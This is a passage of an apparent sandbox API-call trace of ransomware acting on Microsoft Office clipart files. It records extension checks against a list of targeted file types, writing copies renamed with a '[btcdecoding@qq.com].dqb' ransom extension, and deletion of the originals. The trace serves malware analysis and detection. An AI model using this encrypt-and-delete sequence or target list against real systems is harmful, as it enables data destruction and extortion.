lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0055.015] lstrlenW (lpString=".dbf") returned 4 [0055.015] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0055.015] lstrlenW (lpString=".1cd") returned 4 [0055.015] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63 [0055.015] lstrlenW (lpString=".jpg") returned 4 [0055.015] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.186] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.186] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0055.186] GetLastError () returned 0x0 [0055.186] ReadFile (in: hFile=0x238, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x370, lpOverlapped=0x0) returned 1 [0055.370] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x380, lpOverlapped=0x0) returned 1 [0055.371] ReadFile (in: hFile=0x238, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.371] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.371] SetEndOfFile (hFile=0x17c) returned 1 [0055.371] CloseHandle (hObject=0x17c) returned 1 [0055.371] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.371] SetEndOfFile (hFile=0x238) returned 1 [0055.372] CloseHandle (hObject=0x238) returned 1 [0055.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.373] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf")) returned 1 [0055.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0055.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0055.373] lstrlenW (lpString=".doc") returned 4 [0055.373] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.373] lstrlenW (lpString=".docx") returned 5 [0055.373] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.373] lstrlenW (lpString=".pdf") returned 4 [0055.373] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.373] lstrlenW (lpString=".xls") returned 4 [0055.373] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.373] lstrlenW (lpString=".xlsx") returned 5 [0055.373] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.373] lstrlenW (lpString=".ppt") returned 4 [0055.373] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0055.373] lstrlenW (lpString=".zip") returned 4 [0055.373] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.373] lstrlenW (lpString=".rar") returned 4 [0055.373] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.373] lstrlenW (lpString=".bz2") returned 4 [0055.373] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.373] lstrlenW (lpString=".7z") returned 3 [0055.374] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0055.374] lstrlenW (lpString=".dbf") returned 4 [0055.374] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0055.374] lstrlenW (lpString=".1cd") returned 4 [0055.374] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63 [0055.374] lstrlenW (lpString=".jpg") returned 4 [0055.374] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.374] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.374] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0055.375] GetLastError () returned 0x0 [0055.375] ReadFile (in: hFile=0x238, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1264, lpOverlapped=0x0) returned 1 [0055.385] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1270, lpOverlapped=0x0) returned 1 [0055.385] ReadFile (in: hFile=0x238, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.386] WriteFile (in: hFile=0x17c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.386] SetEndOfFile (hFile=0x17c) returned 1 [0055.389] CloseHandle (hObject=0x17c) returned 1 [0055.389] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.389] SetEndOfFile (hFile=0x238) returned 1 [0055.390] CloseHandle (hObject=0x238) returned 1 [0055.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf")) returned 1 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0055.392] lstrlenW (lpString=".doc") returned 4 [0055.392] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString=".docx") returned 5 [0055.392] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.392] lstrlenW (lpString=".pdf") returned 4 [0055.392] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString=".xls") returned 4 [0055.392] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.392] lstrlenW (lpString=".xlsx") returned 5 [0055.392] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.392] lstrlenW (lpString=".ppt") returned 4 [0055.392] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0055.392] lstrlenW (lpString=".zip") returned 4 [0055.392] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.392] lstrlenW (lpString=".rar") returned 4 [0055.392] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString=".bz2") returned 4 [0055.392] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString=".7z") returned 3 [0055.392] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0055.392] lstrlenW (lpString=".dbf") returned 4 [0055.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0055.392] lstrlenW (lpString=".1cd") returned 4 [0055.392] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0055.392] lstrlenW (lpString=".jpg") returned 4 [0055.392] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.409] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.409] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0055.510] GetLastError () returned 0x0 [0055.510] ReadFile (in: hFile=0x23c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1678, lpOverlapped=0x0) returned 1 [0055.528] WriteFile (in: hFile=0x238, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1680, lpOverlapped=0x0) returned 1 [0055.529] ReadFile (in: hFile=0x23c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.529] WriteFile (in: hFile=0x238, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.529] SetEndOfFile (hFile=0x238) returned 1 [0055.529] CloseHandle (hObject=0x238) returned 1 [0055.529] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.530] SetEndOfFile (hFile=0x23c) returned 1 [0055.530] CloseHandle (hObject=0x23c) returned 1 [0055.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.531] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf")) returned 1 [0055.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0055.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0055.531] lstrlenW (lpString=".doc") returned 4 [0055.531] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.531] lstrlenW (lpString=".docx") returned 5 [0055.531] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.531] lstrlenW (lpString=".pdf") returned 4 [0055.531] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.531] lstrlenW (lpString=".xls") returned 4 [0055.531] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.531] lstrlenW (lpString=".xlsx") returned 5 [0055.531] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.531] lstrlenW (lpString=".ppt") returned 4 [0055.531] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0055.531] lstrlenW (lpString=".zip") returned 4 [0055.531] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.531] lstrlenW (lpString=".rar") returned 4 [0055.531] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.531] lstrlenW (lpString=".bz2") returned 4 [0055.531] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.531] lstrlenW (lpString=".7z") returned 3 [0055.531] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0055.532] lstrlenW (lpString=".dbf") returned 4 [0055.532] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0055.532] lstrlenW (lpString=".1cd") returned 4 [0055.532] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0055.532] lstrlenW (lpString=".jpg") returned 4 [0055.532] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.532] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.532] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0055.532] GetLastError () returned 0x0 [0055.532] ReadFile (in: hFile=0x23c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x2576, lpOverlapped=0x0) returned 1 [0055.547] WriteFile (in: hFile=0x238, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2580, lpOverlapped=0x0) returned 1 [0055.548] ReadFile (in: hFile=0x23c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.548] WriteFile (in: hFile=0x238, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.548] SetEndOfFile (hFile=0x238) returned 1 [0055.548] CloseHandle (hObject=0x238) returned 1 [0055.548] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.548] SetEndOfFile (hFile=0x23c) returned 1 [0055.549] CloseHandle (hObject=0x23c) returned 1 [0055.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.550] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf")) returned 1 [0055.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0055.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0055.550] lstrlenW (lpString=".doc") returned 4 [0055.550] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.550] lstrlenW (lpString=".docx") returned 5 [0055.550] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.550] lstrlenW (lpString=".pdf") returned 4 [0055.550] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.550] lstrlenW (lpString=".xls") returned 4 [0055.550] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.550] lstrlenW (lpString=".xlsx") returned 5 [0055.550] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.550] lstrlenW (lpString=".ppt") returned 4 [0055.550] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0055.550] lstrlenW (lpString=".zip") returned 4 [0055.550] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.550] lstrlenW (lpString=".rar") returned 4 [0055.550] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.550] lstrlenW (lpString=".bz2") returned 4 [0055.550] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.550] lstrlenW (lpString=".7z") returned 3 [0055.550] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0055.550] lstrlenW (lpString=".dbf") returned 4 [0055.550] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0055.551] lstrlenW (lpString=".1cd") returned 4 [0055.551] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0055.551] lstrlenW (lpString=".jpg") returned 4 [0055.551] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.557] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.557] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.558] GetLastError () returned 0x0 [0055.558] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1138, lpOverlapped=0x0) returned 1 [0055.560] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1140, lpOverlapped=0x0) returned 1 [0055.560] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.561] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.561] SetEndOfFile (hFile=0x214) returned 1 [0055.561] CloseHandle (hObject=0x214) returned 1 [0055.561] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.561] SetEndOfFile (hFile=0x240) returned 1 [0055.562] CloseHandle (hObject=0x240) returned 1 [0055.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.562] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf")) returned 1 [0055.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0055.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0055.562] lstrlenW (lpString=".doc") returned 4 [0055.562] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.562] lstrlenW (lpString=".docx") returned 5 [0055.562] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.562] lstrlenW (lpString=".pdf") returned 4 [0055.562] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.562] lstrlenW (lpString=".xls") returned 4 [0055.563] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.563] lstrlenW (lpString=".xlsx") returned 5 [0055.563] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.563] lstrlenW (lpString=".ppt") returned 4 [0055.563] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0055.563] lstrlenW (lpString=".zip") returned 4 [0055.563] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.563] lstrlenW (lpString=".rar") returned 4 [0055.563] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.563] lstrlenW (lpString=".bz2") returned 4 [0055.563] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.563] lstrlenW (lpString=".7z") returned 3 [0055.563] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0055.563] lstrlenW (lpString=".dbf") returned 4 [0055.563] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0055.563] lstrlenW (lpString=".1cd") returned 4 [0055.563] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 63 [0055.563] lstrlenW (lpString=".jpg") returned 4 [0055.563] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.563] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.563] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.564] GetLastError () returned 0x0 [0055.564] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x1870, lpOverlapped=0x0) returned 1 [0055.565] WriteFile (in: hFile=0x214, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1880, lpOverlapped=0x0) returned 1 [0055.566] ReadFile (in: hFile=0x240, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, 